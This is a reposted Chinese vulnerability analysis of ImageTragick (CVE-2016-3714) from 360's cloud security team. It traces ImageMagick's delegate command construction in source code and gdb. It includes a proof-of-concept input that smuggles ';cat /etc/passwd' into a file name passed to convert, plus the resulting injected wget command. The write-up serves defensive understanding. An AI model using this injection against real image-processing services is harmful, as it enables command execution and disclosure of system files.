转载

Imagetragick(CVE-2016-3714)漏洞分析

by cyg07 @ 360信息安全部云安全团队(Qihoo360 Cloud Security Team)

一. 写在前面

在奇虎360这个互联网公司里,每一个突袭而来的漏洞,也意味360信息安全部将对此进行一场肉搏战,现在已经在午夜。对于CVE-2016-3714这个黑魔法漏洞,虽说看着面上也能看明白这个东西怎么回事,有时候还是走进源码会比较清晰一点,所以这稿子的内容大致是笔者的一个调试过程。

每次修漏洞的时候,还是会想起老领导刘小雄说过的24小时修复原则,估计这个原则会长期伴随着个人在安全道路上。

Hf!

二. 技术分析

“delegates” 委托或者说是代理模式吧,想起了那年拿着GoF13招不停的练,回头想想好像也就用过一次代理模式。

Imagetragick(CVE-2016-3714)漏洞分析

CVE-2016-3714所在的问题文件是magick/delegats.c,不知道为啥总觉得它的设计很不优雅,姑且作点事后的调侃吧,因为你所看到这篇文章也不优雅。

delegates的实现里主要有个叫 DelegateInfo 的数据结构:

Imagetragick(CVE-2016-3714)漏洞分析

这个结构用于存储DelegateMap:

Imagetragick(CVE-2016-3714)漏洞分析

注意其中的一个例子(其实这里你就可以看出源码作者是要使用xml、转义字符的高度的可扩展性):

”  <delegate decode=/”https/” command=/””wget” -q -O “%o” “https:%M”/”/>”

剩下的我们关心它的两个接口:

1101 MagickExport MagickBooleanType InvokeDelegate(ImageInfo *image_info,

1102   Image *image,const char *decode,const char *encode,ExceptionInfo *exception)

1478 static MagickBooleanType LoadDelegateCache(LinkedListInfo *delegate_cache,

1479   const char *xml,const char *filename,const size_t depth,

1480   ExceptionInfo *exception)

LoadDelegateCache会构建出一个delegate表,InvokeDelegate是用于使用delegate这个表。

比如在Load的过程中会对command字段内的value作提前转义:

Imagetragick(CVE-2016-3714)漏洞分析

转义后,就可以看到(比较基础吧):

(gdb) p commands

$5 = 0x6450c0 “/”wget/” -q -O /”%o/” /”https:%M/””

在 InvokeDelegate 的过程中就开始匹配 delegate的类型,这里使用”HTTPS”作为具体实现来试验,具体测试poc如下:

$gdb ./utilities/.libs/convert ‘https://security_.360.cn”;cat /etc/passwd”‘ 1.jpg

在到达InvokeDelegate 时调试结果如下:

1297       }

1298     status=MagickFalse;

1299     command=InterpretImageProperties(image_info,image,commands[i]); //这里再继续转义

1300     if (command != (char *) NULL)

1301       {

1302         /*

1303           Execute delegate. Here we go.

1304         */

1305         status=ExternalDelegateCommand(delegate_info->spawn,image_info->verbose,

1306           command,(char *) NULL,exception) != 0 ? MagickTrue : MagickFalse;

1307         if (delegate_info->spawn != MagickFalse)

1308           {

1309             ssize_t

1310               count;

(gdb) p command

$26 = 0x6537c0 “/”wget/” -q -O /”/tmp/magick-28319ICbZUTH3xNQK/” /”https://security_.360.cn/”;cat /etc/passwd/”/””

在这里已经拼接出来最终要执行的代码了。其中比较有趣的也就是 InterpretImageProperties,里头实际上就是对 %0 和%M作转义(见magick/property.c):

Imagetragick(CVE-2016-3714)漏洞分析

Imagetragick(CVE-2016-3714)漏洞分析

最后,提供一份进程启动流程图:

Imagetragick(CVE-2016-3714)漏洞分析

三. 写在最后

写到这里,其实只是想表达360的内部信息安全漏洞管控是一场无休止的战斗,共勉!

gl!

原文  http://blogs.360.cn/blog/imagetragickcve-2016-3714漏洞分析/
正文到此结束
所属分类: 编程技术

热门推荐

相关文章

阿里云首购8折
说给你听

本文目录
随机标签
书籍教程
Java入门教程 bootstrap3 CSS Apache基础教程 springboot-demo php ionic 教程 Python mysql教程 eclipse Ubuntu VPS系统配置 AngularJS 教程 Struts2教程 MongoDB教程 Redis教程 Spring教程 Git教程 Jenkins进阶系列 openfire参考指南 Java设计模式 HBase教程 Maven教程 hibernate教程 Docker 教程 memcached教程 Quartz指南 SpringCloud ANTLR教程 Hive教程 java实例教程 Ant教程 Hazelcast教程 Elastic-Job-Lite XStream教程 深入浅出MyBatis SVN教程 ibaties教程 rabittmq教程 WebService CXF学习 Hadoop教程 solr教程 JPA教程 ActiveMQ中文指南 Java内存模型 dubbo教程 Linux入门视频教程
近期评论
  1. 1 Spring Boot集成zipkin快速入门Demo
  2. 2 能用365块大洋去解决的事,千万不要用时间
  3. 3 Spring Boot集成atomikos快速入门Demo
  4. 4 Spring Boot集成fastdfs快速入门Demo
  5. 5 Spring Boot集成Https快速入门Demo
  6. 6 Spring Boot集成easypoi快速入门Demo
  7. 7 Spring Boot集成webflux快速入门Demo
  8. 8 Spring Boot集成Graphql快速入门Demo
  9. 9 Spring Boot API 多版本快速入门Demo
  10. 10 Spring Boot内容协商快速入门Demo
网站信息
  • 文章总数:155,459 篇
  • 文件总数:468,740 个
  • 标签总数:2,264 个
  • 分类总数:90 个
  • 留言数量:2,540 条
  • 在线人数:658 人
  • 运行天数:4,193天
  • 最后更新:2024年04月20日12点
Loading...

其他链接

关于本站

本站定位:个人技术类博客

本站作用:写博客、记日志、闲聊扯淡鼓捣技术。

问题交流

[HBLOG]公众号 HBLOG HBLOG